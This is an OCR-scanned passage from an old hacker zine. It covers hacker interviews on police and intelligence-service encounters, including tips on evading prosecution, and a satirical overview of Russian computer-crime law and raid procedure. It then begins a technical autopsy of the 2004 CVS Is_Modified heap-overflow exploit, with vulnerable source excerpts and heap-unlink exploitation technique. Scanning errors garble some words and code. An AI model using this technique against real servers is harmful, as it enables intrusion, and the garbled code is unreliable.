I think they thought we’re a big active crew which does hacking, hacking 
and hacking all the time. i guess they wanted to find out if we e arn 
money with that, e.g., of if we’re into big illegal activities. because 
of course, it might be illegal just to be a member of an illegal group. 
like organzied crime. 


<THE CIRCLE OF LOST HACKERS> QUESTION: in the other hand, what do you 
think the other hacking crew think about your group ? 


We and other hackers saw us as group which shares knowledge, exchange 
security related informations, have nice meetings, find security problems 
and write software to exploit that problems. I definitly did not see us 
as organzied hacking group which earns money, steal stuff or make other 
people loose money, but, I mean, you cant know what a group really does 
just from visiting a webpage and looking at some papers or tools. 


14.txt Wed Apr 26 09:43:45 2017 7 
<THE CIRCLE OF LOST HACKERS> QUESTION: are the troubles over now ? 


yeah, troubles are completely over now. i got a fine, 75 german marks 
per cd, so i had to pay around 800 german marks. I am not previously 
convicted, no crime record at all. no civil action. 


<THE CIRCLE OF LOST HACKERS> QUESTION: Now that troubles are over, do you 
have some advices for hackers in your country, to avoid beeing busted, 
or to avoid having troubles like you did ? 


hehe yeah, in short words: 


a) Always crypt your ENTIRE harddisk 


b) Do NOT own any, i repeat, any illegal warez cd. reason: any judge 
knows illegal copied cds. he understands that. so, like in my case, 
you get accused for hacking and you end up with a fine for illegal 
warez. Thats definitly not necessary. and, furthermore, you get your 
computer stuff back MUCH easier & faster if you dont have any warez 
cd. usually, they cant prove your hacking. but warez cd’s are easy. 


c) do not tell ANYTHING at the raid. 


d) if you are really into trouble, go to a lawyer after the raid. 


<THE CIRCLE OF LOST HACKERS> Thanks for the interview WILLY ! 


De nada, you are welcomed ;) 


Zac’s interview 


<THE CIRCLE OF LOST HACKERS> Hello Zac, nice to meet you 


Hi new staff, how’s life ? 


<THE CIRCLE OF LOST HACKERS> QUESTION: Can you tell us what kind of 
relationship you’re (as a hacker) having with the police in your country ? 


I live in France, as a hacker I never had troubles with justice . In my 
country, you can have troubles in case you are a stupid script kiddy (most 
of the time), or if you disturb (even very little) intelligence services 


Actually we have very present special services inside the territory, 
whereas the police itself is too dumb to understand anything about 
computers . Some special non-technical group called BEFTI usually deals 
with big warezers, dumb carders, or people breaking into businesses’s 
PABX and doing free calls from there, and stuffs like that 


<THE CIRCLE OF LOST HACKERS> Explain to us how you got into hacking, 
since when you are involved in the scene, and when you started to play 
with TCP/IP networks 


I started quite late in the 90’ when I met friends who were doing warez 
and trying to start with hacking and phreaking . I have only a few years 
of experience on the net, but I learnt quite fast beeing always behind 
the screen, and now I know a lot of people, all around the world, on 

IRC and IRL 
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Beside this, I had my first computer 15 years ago, owned many INTEL based 
computers, from 286 to Pentium II . I have now access to various hardware 
and use these ressources to do code . I used to share my work with other 


(both whitehats and blackhats) peoples, I dont hide myself particulary 
and I am not involved in any kind of dangerous illegal activity 


<THE CIRCLE OF LOST HACKERS> QUESTION: When did you get into troubles 
for the first time ? 


Last year (2001), when DST (’Direction de la Surveillance du Territoire’, 
french inside-territory intelligence services) contacted me and asked if 
I was still looking for a job . I said yes and accepted to meet them 

I didnt know it was DST at that time, but I catched them using google ;) 
They first introduced themself from ’Ministere de l1’Interieur’, which is 
basicaly Ministery charged of police coordination and inside-territory 
intelligence services . In another later interview, they told me they 
were DST, I’11 call them ‘the feds’ 


<THE CIRCLE OF LOST HACKERS> QUESTION: How did they find you ? 


I still have no idea, I guess someone around me taught them about me 
When I asked, they told me it was from one of the various (very few) 


businesses I had contacted at that time . Take care when you give your 
CV or anything, keep it encrypted when it travels on the net, becaus 
they probably sniff a lot of traffic . I also advise to mark it ina 


different way each time you give it, so that you can know from where it 


= 


leaked using SE at the feds 


<THE CIRCLE OF LOST HACKERS> QUESTION: Can you tell more about the 
organization ? 


Some information about them has already been disclosed in french 
electronic fanzines like Core-Dump (92’) and NoWay (94’), both written 
by NeurAlien . I heard he got mad problem because of this, I dont really 
want to experiment the same stuff 


<THE CIRCLE OF LOST HACKERS> QUESTION: is there other special services 
in your country who are involved in hacking ? 


Besides DST, there is DGSE (’Direction General de la Securite Exterieur’), 
these guys most focuss on spying, military training, and information 
gathering outside the territory . There is also RG (’Renseignement 
generaux’, trans. : General Information) , a special part of police 

which is used to gather various information about every sensibl vents 
happening . The rumor says there’s always 1 RG in each public conference, 
meeting, etc and its not very difficult to believe 


<THE CIRCLE OF LOST HACKERS> QUESTION: can you compare the organization 
with an equivalent one in another country ? 


Their tasks is similar to CIA’s and NSA’s one I guess . DST and DGSE 
used to deal with terrorists and big drugs trafic networks also, they 

do not target hackers specifically, their task is much larger since they 
are the governemental intelligence services in France 
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<THE CIRCLE OF LOST HACKERS> Is DST skilled with computers ? 


They -seem-— quite skilled (not too much, but probably enough to bust a 
lot of hackers and keep them on tape if necessary) . They also used to 
recruite people in order to experiment all the new hacking techniques 

(wireless, etc) 


However, I feel like their first job is learning information, all 

the technical stuff looks like a hook to me . Moreover, they pay very 

bad, they’1ll argue that having their name on your CV will increase your 
chances to get high payed jobs in the future . Think twice before signing, 
this kind of person has very converging tendances to lie 


<THE CIRCLE OF LOST HACKERS> QUESTION: what kind of information did they 
ask during the interviews ? 


The first time, it was 2 hours long, and there was 2 guyz . One was 
obviously understanding a bit about hacking (talking about protocols, 
revers ngineering, he assimilated the vocabulary as least), the other 
fe) 

W 


ne wasnt doing the difference between an exploit and a rootkit, and 
as probably the /nice fed around’ 


hey asked everything about myself (origin, family, etc), one always 
aking notes, both asking questions, trying to appear like interrested 

n my life . They asked everything from the start to the end . They 

sked if the official activity I have right now wasnt too boring, 

ho were the guy I was working with, in what kind of activity I was 
nvolved, and the nature of my personnal work . They also asked me if I 
as aware of Oday vulnerabilities into widely-used software . I knew I 
dd not to tell them anything, and try to get as much information about 
hem during the interview . You can definitely grab some if you ask them 
uestions . Usually, they will tell you ’Here I am asking the questions’, 
ut sometimes if you are smart, you can guess from where they got the 
nformation, what are their real technical skills level, etc 


Bb O.O to er = ORTH 


At the end of the interview, they’1ll ask what they want to know if you 
didnt tell them . They can ask about groups they think you are friend 
with, etc . If you just tell them what is obviously known (like, 

‘oh yeah I heard about them, its a crew interrested in security, but 
I’m not in that group’) and nothing else, its ok 


<THE CIRCLE OF LOST HACKERS> QUESTION: What do you think they were really 
knowing ? 


I guess they are quite smart, because they know a lot of stuff, and 
ask everything as if they were not knowing anything . This way, they 
can spot if you are lying or not . Also, if you tell them stuffs you 
judge irrevelant, they will probably use it during other interviews, 
in order to guess who you are linked to 


<THE CIRCLE OF LOST HACKERS> QUESTION: are the troubles over now ? 


x 


I hope they will let me where I am, anyway I wont work for them, I 
taught a few friends of mine about it and they agreed with me . Their 
mind changes over time and government, I highly advise -NOT- to work 
for them unless you know EXACTLY what you are doing (you are a double 
agent or something lol) 


<THE CIRCLE OF LOST HACKERS> do you have some advices for hackers in 
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your country, to avoid beeing busted, or to avoid having troubles ? 


Dont have a website, dont release shits, dont write articles, dont do 
conference, dont have a job in the sec. industry . In short : it’s very 
hard . If they are interrested in the stuffs you do and hear about it, 
they’1l have to meet you one day or another . They will probably just 
ask more about what you are doing, even if they have nothing against 
you . Dont forget you have the right to refuse an interview and refuse 
answering questions . I do not recommand to lie to them, because they 
will guess it easily (dont forget information leakage is their job) 


I advise all the hackers to talk more about feds in their respectiv 
groups because it helps not beeing fucked . Usually they will tell 

you before leaving ’Dont forget, all of this is CONFIDENTIAL’, it is 

just their way to tell you ‘Okay, thanks, see you next time !’ . Dont 

be impressed, dont spread information on the net about a particular guy 
(targetted hacker, or fed), you’ll obviously have troubles because of it, 
and its definitely not the good way to hope better deals with feds in 
the future . To FEDS: do not threat hackers and dont put them in jail, 

we are not terrorists . Dont forget, we talk about you to each other, 

and jailing one of us is like jailing all of us 


<THE CIRCLE OF LOST HACKERS> Thanks zac =) 


At your service, later 


Big Brother does Russia 
by 
ALIEN Assault 


This file is a basic description of russian computer law related 
issues. Part 1 contains information gathered primarily from 

open sources. As this sources are all russian, information may be 
unknown to those who doesn’t know russian language. Part 2 consists 
of instructions on computer crime investigation: raid guidelines and 
suspect’s system exploration. 


0 — DISCLAIMER 1 - LAW 


1.1 - Basic Picture 1.2 - Criminal Code 1.3 - Federal Laws 
2 — ORDER 
2.1 - Tactics of Raid 2.2 - Examining a Working Computer 2.3 - 


Expertise Assignment 


--[{ O.DISCLAIMER. 


INFORMATION PROVIDED FOR EDUCATIONAL PURPOSES ONLY. IT MAY BE ILLEGAL 
IN YOUR COUNTRY TO BUST HACKERS. IT MUST BE ILLEGAL AT ALL. THERE ARE 
BETTER THINGS TO DO. EXPLORE YOURSELF AND THIS WORLD. SMILE. LIVE. 


a= [u L. LAW. 
----[ 1.1. Basic Picture. 
Computer-related laws are very draft and poorly describes what are 


ones about. Seems that these are simply rewritten instructions 
from 60’s *Power Computers* that took a truck to transport. 


Common subjects of lawsuits include carding, phone piracy (mass 
LD service thievery) and... hold your breath... virii infected 
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warez trade. Russia is a real warez heaven you can go to about 
every media shop and see lots of CDs with warez, and some even has 
"CRACKS AND SERIALS USAGE INSTRUCTIONS INCLUDED" written on front 
cover (along with "ALL RIGHTS RESERVED" on back)! To honour pirates, 
they include all .nfo files (sometimes from 4-5 BBSes warez was 
courriered through). It is illegal but not prosecuted. Only if 
warez are infected (and some VIP bought them and messed his system up) 
shop owners faces legal problems. 


Hacking is *not that common’, as cops are rather dumb and busts 
mostly script kiddies for hacking their ISPs from home or sending your 
everyday trojans by email. 


Ther ar thr main organisations dealing with hi-tech crime: 
FAPSI (Federal Government Communications and Information Agency 

— mix of FCC and secret service), UKIB FSB (hi-tech feds; stands for 
departamernt of computer and information security) and UPBSWT MVD 
(hi-tech crime fightback dept.) which incorporates R unit (R for radio - 
busts ham pirates and phreaks). 


FSB (secret service) also runs NIIT (IT research institute). 
This organisation deals with encryption (reading your PGPed mail), 
examination of malicious programs (revealing Windoze source) and 

restoration of damaged data (HEXediting saved games). NIIT is believed 


to possess all seized systems so they have tools to do the job. 


UPBSWT has a set of special operations called SORM (operative 

and detective measures system). Media describes this as an 
Echelon/Carnivore-like thing, but it also monitors phones and 
pagers. Cops claims that SORM is active only during major criminal 
investigations. 


----[ 1.2. Criminal Code. 


Computer criminals are prosecuted according to this articles of the Code: 


- 159: Felony. This mostly what carders have to do with, accompanied by 
caught-in-the-act social engineers. Punishment varies 
from fine (minor, no criminal record) to 10 years prison term 
(organized and repeated crime). 


- 272: Unauthorized access to computer information. Easy case will end 

up in 
fine or up to 2 years probation term, while organized, repeated 
or involving "a person with access to a computer, computer complex 
or network" (!#S@!) crime may lead to 5 years imprisonment. 
Added to this are weird comments on what are information, 
intrusion and information access. 


-— 273: Production, spreading and use of harmful computer 
programs. Sending 
trojans by mail considered to be lame and punished by up to 3 
years in prison. Part II says that "same deeds *carelessly* caused 
hard consequences" will result in from 3 to 7 years in jail. 


-— 274: Computer, computer complex or network usage rules breach. This 
one is 

tough shit. In present, raw and somewhat confused 

state this looks, say, *incorrect*. It needs that at least 


technically literate person should provide correct and clear 
definitions. After that clearances this could be useful thing: 

if someone gets into a poorly protected system, admin will 
have to take responsibility too. Punisment ranges from ceasing 
of right to occupy "defined" (defined where?) job positions to 

2 years prison term (or 4 if something fucked up too seriously). 
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-—---[ 1.3. Federal Law. 


Most notable subject related laws are: 


"On Information, Informatization and Information Security" 
(20.02.95). 5 chapters of this law defines /* usually not 

correct or even intelligent */ various aspects of information and 
related issues. Nothing really special or important - civil rights 
(nonexistent), other crap, but still having publicity (due to weird 
and easy-to-remember name i suppose) and about every journalist covering 
ITsec pastes this name into his article for serious look maybe. 


"National Information Security Doctrine" (9.9.2K) is far more 
interesting. It will tell you how dangerous Information Superhighway 
is, and this isn’t your average mass-media horror story - it’s 

a real thing! Reader will know how hostile foreign governments are 
busy imlpementing some k-rad mind control tekne3q to gain rO00Ot on 
your consciousness; undercover groups around the globe ar ngaging in 
obscure infowarfare; unnamed but almighty worldwide forces also about 
to control information...ARRGGH! PHEAR!!! 


{ALIEN special note: That’s completely true. You suck Terrans. We’1l 
own your planet soon and give all of you a nice heavy industry job}. 


Liberal values are covered too (message is BUY RUSSIAN). Also there are 
some definitions (partly correct) on ITsec issues. 


"On Federal Government Communications and Information" (19.2.93, 
patched 24.12.93 and 7.11.2K). Oh yes, this one is serious. Everyone 
is serious about his own communications - what can i say? Main message 
is "RESPONSIBLES WILL BE FOUND. OTHERS KEEP ASIDE". 


Interesting entity defined here is Cryptographic Human Resource - 

a special unit of high qualified crypto professionals which must be 
founded by FAPSI. To be in Cryptographic Human Resource is to serve 
wherever you have retired or anything. 


Also covered are rights of government communications personnel. They 
have no right to engage in or to support strike. Basically they have 
no right to fight for rights. They don’t have a right to publish or 
to tell mass-media anything about their job without previous censorship 
by upper level management. 


Cryptography issues are covered in "On Information Security 
Tools Certification" (26.6.95 patched 23.4.96 and 29.3.99) and "On 
Electronic Digital Signature" (10.2.02). Not much to say about. Both 


mostly consists of strong definitions of certification procedures. 


--[ 2. ORDER. 


----[ 2.1. Tactics of Raid. 


Given information is necessary for succesful raid. Tactics of raid 
strongly depends on previously obtained information. 


It is necessary to define time for raid and measures needed to conduct 
it suddenly and confidentially. In case of presence of information 
that suspect’s computer contains criminal evidence data, it is 
better to begin raid when possibility that suspect is working on that 
computer is minimal. 


Consult with specialists to define what information could be stored 
in a computer and hav adequate technics prepared to copy that 
information. Define all measures to prevent criminals from destroying 
evidence. Find raid witnesses who are familiar with computers 
(basic operations, programs names etc.) to exclude possibility of 
posing raid results as erroneous at court. Specifity and complexity 
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of manipulations with computer technics cannot be understood 
by illiterate, so this may destroy investigator’s efforts on 
strengthening the value of evidenc 


Witness’ misunderstanding of what goes on may make court discard evidence. 
Depending on suspect’s qualification and professional skills, 
define a computer technics professional to involve in investigation. 


On arrival at the raid point is necessary to: enter fast and sudden 

to drive computer stored information destruction possibility to the 
minimum. When possible and reasonable, raid point power supply must be 
turned off. 


Don’t allow no one touch a working computer, floppy disks, turn computers 
on and off; if necessary, remove raid personnel from the raid point; 
don’t allow no one turn power supply on and off; if the power supply 
was turned off at the beginning of raid, it is necessary to unplug all 
computers and peripherals before turning power supply on; don’t manipulate 


computer technics in any manner that could provide inpredictable results. 


After all above encountered measures wer taken, it is necessary 
to preexamine computer technics to define what programs are working 
at the moment. If data destruction program is discovered active 


it should be stopped immediately and examination begins with exactly 
this computer. If computers are connected to local network, it is 
reasonable to examine server first, then working computers, then other 
computer technics and power sources. 


----[ 2.2. Examining a Working Computer. 
During the examination of a working computer is necessary to: 


-— define what program is currently executing. This must be done by 
examining 
the screen image that must be described in detail in raid 
protocol. While necessary, it should be photographed or videotaped. Stop 
running program and fix results of this action in protocol, describing 
changes occured on computer screen; 


define presence of external storage devices: a hard drive (a 
winchester*), 

floppy and ZIP type drives, presence of a virtual drive (a temporary 

disc which is being created on computer startup for increasing 

performance speed) and describe this data in a protocol of raid; 


define presence of remote system access devices and also the 
current state of 

ones (local network connection, modem presence), after what 

disconnect the computer and modem, describing results of that in 

a protocol; 


—- copy programs and files from the virtual drive (if present) to the 
floppy disk or to 
a separate directory of a hard disk; 


—- turn the computer off and continue with examining it. During this is 
necessary to 
describe in a raid protocol and appended scheme the location 
of computer and peripheral devices (printer, modem, keyboard, 
monitor etc.) the purpose of every device, name, serial number, 
configuration (presence and type of disk drives, network cards, 
slots etc.), presence of connection to local computing network and 
(or) telecommunication networks, state of devices (are there tails 
of opening); 


- accurately describe the order of mentioned devices interconnection, 
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marking 
(if necessary) connector cables and plug ports, and disconnect computer 
devices. 


—- Define, with the help from specialist, presence of nonstandard 
apparatus inside 
the computer, absence of microschemes, disabling of an inner power 
source (an accumulator); 


- pack (describing location where were found in a protocol) storage 
disks and 
tapes. Package may be special diskette tray and also common paper 
and plastic bags, excluding ones not preventing the dust (pollutions 
etc.) contact with disk or tape surface; 


—- pack every computer device and connector cable. To prevent 
unwanted 
individuals’ access, it is necessary to place stamps on system block - 
stick the power button and power plug slot with adhesive tape and 
stick the front and side panels mounting details (screws etc.) too. 


If it is necessary to turn computer back on during examination, startup 
is performed with a prepared boot diskette, preventing user programs 
from start. 


* winchester - obsolete mainstream tech speak for a hard drive. Seems to 
be of western origin but i never met this term in western sources. Common 
shortage is "wint". 


----[ 2.3. Expertise Assignment. 


Expertise assignment is an important investigation measure for such 
cases. General and most important part of such an expertise is 
technical program (computer technics) expertise. MVD (*) divisions have 
no experts conducting such expertises at the current time, so it 
is possible to conduct such type of expertises at FAPSI divisions 

or to involve adequately qualified specialists from other organisations. 


Technical program expertise is to find answers on following: 


- what information contains floppy disks and system blocks presented to 
expertise? 


- What is its purpose and possible use? 


—- What programs contains floppy disks and system blocks presented to 
expertise? 


- What is their purpose and possible use? 


—- Are there any text files on floppy disks and system blocks presented to 
expertise? 


- If so, what is their content and possible use? 


- Is there destroyed information on floppy disks presented to expertise? 


- If so, is it possible to recover that information? 
- What is that information and what is its possible use? 


- What program products contains floppy disks presented to expertise? 


—- What are they content, purpose and possible use? 
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Ar between those programs ones customized for passwords 
guessing or 
otherwise gaining an unauthorized computer networks access? 


- If so, what are their names, work specifications, possibilities of 
usage to 
penetrate defined computer network? 


Are ther vidence of defined program usage to penetrate th 
abovementioned network? 


-— If so, what is that evidence? 
- What is chronological sequence of actions necessary to start defined 
program 


or to conduct defined operation? 


- Is it possible to modify program files while working in a given 
computer network? 


- If so, what modifications can be done, how can they be done and from 
what computer? 


- Is it possible to gain access to confidential information through 
mentioned network? 


- How such access is being gained? 
—- How criminal penetration of the defined local computer 
network was 


committed? 


- What is the evidence of such penetration? 


- If this penetration involved remote access, what are the possibilites 
of identifying an 
originating computer? 


- If an evidence of a remote user intrusion is absent, is it possible 


to point computers from 
which such operations can be done? 


Questions may be asked about compatibility of this or that programs; 

possibilities of running a program on defined computer etc. Along with 

these, experts can be asked on purpose of this or that device related 

to computer technics: 

—- what is the purpose of a given device, possible use? 

—- What is special with its construction? 

— What parts does it consist of? 

- Is it industrial or a homemade product? 

- If it is a homemade device, what kind of knowledge and in what kind of 
science and technology do its maker possess, what is his professional 


skill level? 


- With what other devices could this device be used together? 


— What are technical specifications of a given device? 


Given methodic recommendments are far from complete list of questions 
that could be asked in such investigations but still does reflect th 
important aspects of such type of criminal investigation. 
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* MVD (Ministry of Inner Affairs) - Russian police force. 
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The art of Exploitation: 
Come back on a exploit 


by vl4dimlr of AcldBltch3z 


Dear Underground, starting from this release, the Circle of Lost Hackers 
decided to publish in each release a come back on a public exploit known 
from a long time. This section could be called ’autopsy of an exploit’. 


The idea is to explain the technical part of a famous exploit as well 
as its story, post-mortem. Here we start with the CVS "Is-modified" 
exploit who leaked in 2004. 


PRELUDE 
Exploitation is an art. 


Coding an exploit can be an art form in itself. To code a true exploit, 
you need the total control on the system. To achieve this feat, we usually 
need to understand, analyze and master every pieces of the puzzle. Nothing 
is left to chance. The art of exploitation is to make the exploit 
targetless, ultimately oneshot. To go further the simple pragmatic 
exploitation. Make it more than a simple proof of concept shit. Put 

all your guts in it. Try to bypass existing protection techniques. 


A nice exploit is a great artwork, but confined to stay in the shadow. 

The inner working are only known by its authors and the rare code readers 
searching to pierce its mysteries. Its for the latter ones that this 
Ss 
t 


ection was created. For the ones who are hungry about the information 
hat hides behind the source code. 


This is the only reason behind the "r34d 7h3 c0d3 d00d" of the usage () 
function in this exploit : to force people to read the code, appreciate 
what you have in hand. Not to provide them a new tools or a new weapons 
but make them understand the various technical aspects of it. 


Each exploit is built following a particular methodology. We need to 
deeply analyze all the possibilities of the memory allocations until we 
master all of its parameters, often to a point where even the original 
programmers were ignoring these technical aspects. It is about venturing 
yourselves in the twists and turns, the complexity of the situation and 
finally discovering all the various opportunities that are available to 
you. To see what the fate has to offer us, the various potentials at our 
disposal. To make something out of it. Try to take out the best from 

the situation. When you’ll get through this invisible line, the lin 
that separates the simple proof of concept code from the best exploit 
possible, the one that guarantees you a shell every time, you could 

then say that the creation of an art form has just begun. The joy of 
gazing at your own piece of work leveraging a simple memory overwrite 

to a full workable exploit. It is a technical jewel of creativity and 
determination to bring a small computer bug to its full potential. 


Who has never rooted a server with the exploit '’x2’? Who never waited 
in front of his screen, watching the different steps, waiting for it to 
realize the great work it was made for ? But, how many people really 
understood the dichotomies of ’x2’ and how it worked ? What was really 
happening behind what was printed on the screen, in this unfinished 
version of the exploit that got leaked and abused? 


Beyond the pragmatic kiddie who wants to get an access, this section 
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aims at being the home for those who are motivated by curiosity, by 

the artistic sensibility at such exploits. This section is not meant 

to learn others how to own a server, but instead to teach them how the 
exploit is working. It is a demystification of the few exploits that 
leaked in the past of the underground to become in the public domain. It 
is about exploits that have been over exploited by a mass of incompetent 
people. This section is for people who can see, not for people who are 
only good at fetching what really have value. 


In fact, this section is about making justice to the original exploit. 

It is a return on what really deserves attention. At a certain point 

in time, the required level of comprehension to achieve a successful 
exploitation reaches th dge of insanity. The spirit melts with madness, 
we temporarily loose all kind of rationality and we enter a state of 
illumination. 


It’s the fanaticism of the passionate that brings this to its full extent, 
at his extreme, demonstrate that it’s possible to transcend the well 
known, to prove we can always achieve more, It is about pushing the 
limits. And then w nter the artistic creation, 


No, we are not moving away, but we are instead getting closer to the 
reality that hides behind an exploit. Only a couple of real exploits 
have been made public. The authors of them are generally smart enough 
to keep them private. Despite this, leaks happen for various reasons 
and generally it’s a beginner error. 


The real exploit is not the one that has 34 targets, but only one, namely 
all at the same time. An exploit that takes a simple heap overflow and 
makes it work against GRsec, remotely and with ET_DYN on the binary. You 
will probably use this exploit only once in your whole life, but the 

most important part is the work accomplished by the authors to create it. 
The important part is the love they put in creating it. 


Maybe you’ll learn nothing new from this exploit. In fact, the real 

goal is not to give you new exploitation techniques. You are grown up 
enough to read manuals, find your own techniques, make something out of the 
possibilities offered to you, the goal is to simply give back some praise 
to this arcane of obscured code forsaken from most of the people, this 
pieces of code which have been disclosed but still stay misunderstood. 


A column with the underground spirit, the real, for the expert and the 
lover of art. For the one who can see. 


The CVS "Is_Modified" exploit 
vl4dimlir of acldbltch3z 


vd@phrack.org 


1 - Overview 


2 - The story of the exploit 


3 - The Linux exploitation: Using malloc voodoo 


4 - A couple of words on the BSD exploitation 


5 -— Conclusion 


ee Overview 
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We will, through this article, show you how the exploitation under the 
Linux operating system was made possible, and then study the BSD case. 
Both exploitation techniques are different and they both lead to a 
targetless and "oneshot" scenario. Remember that the code is 3-years 
old. I know that since, the glibc library has included a lot of changes 
in its malloc code. Foremost, with glibc 2.3.2, the flag MAIN_ARENA 
appeared, the FRONTLINK macro was removed and there was the addition 

of a new linked list, the "fast_chunks". Then, since version 2.3.5, 

the UNLINK() macro was patched in a way to prevent a "write 4 bytes to 
anywhere" primitive. Last but not least, on the majority of the systems, 
the heap is randomized by default along with the stack. But it was not 
the case at the time of this exploit. The goal of this article, as it 
was explained earlier, is not to teach you new techniques but instead to 
explain you what were the techniques used at that time to exploit the bug. 


--[ 2 - The story of the exploit 


This bug has originally been found by [CENSORED]. A first proof of concept 
code was coded by kujikiri of acldbltch3z in 2003. The exploit was working 
but only for a particular target. It was not reliable because all the 
parameters of the exploitable context were not taken into account. The 
main advantage of the code was that it could authenticate itself to the 
CVS server and trigger the bug, which represents an important part in 

the development of an exploit. 


The bug was then showed to another member of the acldbltch3z team. 

It’s at that moment that we finally decided to code a really reliable 
exploit to be use in the wild. A first version of the exploit was coded 
for Linux. It was targetless but it needed about thirty connexions 

to succeed. This first version of the exploit submitted some addresses 
to the CVS server in order to determine if they were valid or not by 
looking if the server crashed or not. 


Then another member ported the exploit for the *BSD platform. As a 
result, a targetless and "oneshot" exploit was born. As a challenge, 

I tried to came up with the same result for the Linux version, and 

my perseverance finally paid back. Meanwhile, a third member found an 
interesting functionality in CVS, that wont be presented here, that gives 
the possibility to bruteforce the thr mandatory parameters necessary 
for a successful exploitation: the cvsroot, the login and the password. 


It took me one night of passion (nothing sexual) to gather all those 
three pieces of code into one, and the result was cvs_freebsd_linux.c, 
which was later leaked. Another member of the underground later coded a 
Solaris version, but without the targetless and "oneshot" functionality. 
This exploit won’t be presented her 


This bug, as a matter of fact, was later "discovered" by Stefan Esser 
and disclosed by matters. We had a doubt that Stefan Esser himself 
found that exact same bug which was known in the underground. Even if 
he hadn’t done so, he later redeemed himself while auditing the CVS 
source code with a fellow of his and by finding a certain number of 
other bugs. This proves he is able to find bugs, whatever. 


The code was finally made public by [CENSORED] who signed it with "The 
Axis of Eliteness", and bragged about the fact that he already rooted 
every i interesting targets currently available. It was not a great lost, 
even though it made a pinch at the heart to see publicly that opensource 
CVS servers went compromised. 


--[ 3 - The Linux exploitation: Using malloc voodoo 


The original flaw was a basic heap overflow. Indeed, it was possible 
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to overwrite the heap with data under our control, and even to insert 
non alphanumeric characters without buffer length restrictions. It was 
a typical scenario. 


Moreover, and that’s what is wonderful with the CVS server, by analyzing 
the different possibilities, we figured out that it was quite easy to 
force some calls to malloc() of an arbitrary size and chose the ones 
that we want to free(), with little restrictions. 


The funny thing is, when I originally coded the Linux version of 

the exploit, I did not know that it was possible to overwrite the 
memory space with completely arbitrary data. I thought that the only 
characters that you could overwrite memory with were ’M’ and O0x4d. I 
had not analyzed the bug enough because I was quickly trying to find 
an interesting exploitation vector with the information I already had 
in my hands. Consequently, the Linux version exploits the bug like a 
simple overflow with the Ox4d character. 


he first difficulty that you meet with the heap, is that it’s pretty 
unstable for various reasons. A lot of parameters change the memory 
layout, such as the amount of memory allocations that were already 
performed, the IP address of the server and other internal parameters of 
the CVS server. Consequently, the first step of the process is to try 

to normalize the heap and to put it in a state where we have complete 
control over it. We need to know exactly what is happening on the remote 
machine: to be sure about the state of the heap. 


A small analysis of the possibilities that the heap offers us reveal this: 


I had to analyze the various possibilities of memory allocation offered by 
the CVS server. Fortunately, the code was quite simple. I quickly found, 
by analyzing all the malloc() and free() calls, that I could allocate 
memory buffers with the "Entry" command. 


The function that accomplishes this is serve_entry, the code is quite 
straightforward: 


static void serve_entry (arg) 
char *arg; 
{ 


struct an_entry *p; char *cp; 


[...] cp = arg; [..-] p = xmalloc (sizeof (struct an_entry)); cp 

= xmalloc (strlen (arg) + 2); strcpy (cp, arg); p->next = entries; 
[1] p->entry = cp; 

entries = p; 


} 


Inside this function, which takes as an argument a pointer to a string 
that we control, there is a memory allocation of the following structure: 


struct an_entry { 
struct an_entry *next; char *entry; 


} 5 


Then, memory for the parameter will be allocated and assigned to the 
field "entry" of the previously allocated "an_entry" structure that we 
already defined, as you can see in [1]. This structure is then added 


to the linked list of entries tracked by the global variable "struct 
an_entry * entries". 


Therefore, if we are Ok with the fact that small "an_entry" structures 
are getting allocated in between our controlled buffers, we can then 
use this vector to allocate memory whenever we want. 


Now, if we want to call a free(), we can use the CVS "noop" command which 
calls the "server_write_entries()" function. Here is a code snippet from 


15.txt Wed Apr 26 09:43:45 2017 5 


this function: 


static void server_write_entries () { 
struct an_entry *p; struct an_entry *q; 


Lixo} for (p = entries; p != NULL; ) 
{ 
[...] free (p->entry); q = p->next; free (p); p = q; 
} 
entries = NULL; 
} 


As you can see, all the previously allocated entries will now be free(). 
Note that when we talk about an ’entry’ here, we refer to a pair of 
structure an_entry with his -—>entry field that we control. 


Considering the fact that all the buffers that we allocated will be freed, 
this technique suits us well. Note that there were other possibilities 
less restrictive but this one is convenient enough. 


So, we know now how to allocate memory buffers with arbitrary data in it, 
even with non alphanumeric characters, and how to free them too. 


Let’s come back to the original flaw that we did not described yet. Th 
vulnerable command was "Is_Modified" and the function looked like this: 


static void serve_is_modified (arg) 
char *arg; 


{ 


struct an_entry *p; char *name; char *cp; char *timefield; 


for (p = entries; p != NULL; p = p->next) { 
[1] name = p->entry + 1; 
cp = strchr (name, '/'); if (cp != NULL 
&& strlen (arg) == cp - name && strncmp (arg, name, 


cp - name) == 0) 


if (*timefield == ’/’) { 
Dsstece-') cp = timefield + strlen (timefield); 
cp[1] = ’\0’; while (cp > timefield) { 
[2] *cp = cp[-1]; 
—~CPy 


} 
} *timefield = 'M’; break; 


As you can see, in [2], after adding an entry with the "Entry" command, 
it was possible to add some ’M’ characters at the end of the entries 
previously inserted in the "entries" linked list. This was possible for 
the entries of our choice. The code is explicit enough so I don’t detail 
it more. 


We now have all the necessary information to code a working exploit. 
Immediately after we have established a connection, the method used to 
normalize the heap and put it in a known state is to use the "Entry" 
command. With this particular command, we can add buffers of an arbitrary 
size. 


The fill_heap() function does this. The macro MAX_FILL_HEAP tells the 
maximum number of holes that we could find in the heap. It is set ata 
high value, to anticipate for any surprise. We start by allocating many 
big buffers to fill the majority of the holes. Then, we continue to 
allocate a lot of small buffers to fill all the remaining smaller holes. 


At this stage, we have no holes in our heap. 
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Now, if we sit back and think a little bit, we know that the heap layout 
will looked something like this: 


[...] [an_entry] [buf1] [an_entry] [buf2] [an_entry] [bufn] [top_chunk 


Note : During the development of the exploit, I modified the malloc 
code to add functions of my own that I preloaded with LD_PRELOAD. This 
modified version would then generate various heap schemes to help me 
debug the heap. Note that some hackers use heap simulators to know the 
heap state during the development process. These heap simulators can be 
simply a gdb script or something using the libncurses. Any tools which 
can represent the heap state is useful. 


Once the connection was established and the fill_heap() function was 
called, we knew th xact layout of the heap. 


= 


he challenge was now to corrupt a malloc chunk, insert a fake chunk 

and make a call to free() to trigger the UNLINK() macro with ’fd’ and 
‘bk’ under our control. This would let us overwrite 4 arbitrary bytes 
anywhere in memory. This is quite easy to do when you have the heap 

in a predictable state. We know that we can overflow "an_entry->entry" 
buffers of our choice. We will also inevitably overwrite what’s located 
after this buffer, either the top chunk or the next "an_entry" structure 
if we have previously allocated one with another "Entry". We will try to 
use the latter technique because we don’t want to corrupt the top chunk. 


Notice: From now on, Since the UNLINK macro now contains security checks, 
we could instead use an overflow of the top chunk and trigger a call to 
set_head() to exploit the program, as explained in another article of 
this issue. 


Practically, we know that chunk headers are found right before the 
allocated memory space. Let’s focus on the interesting part of the memory 
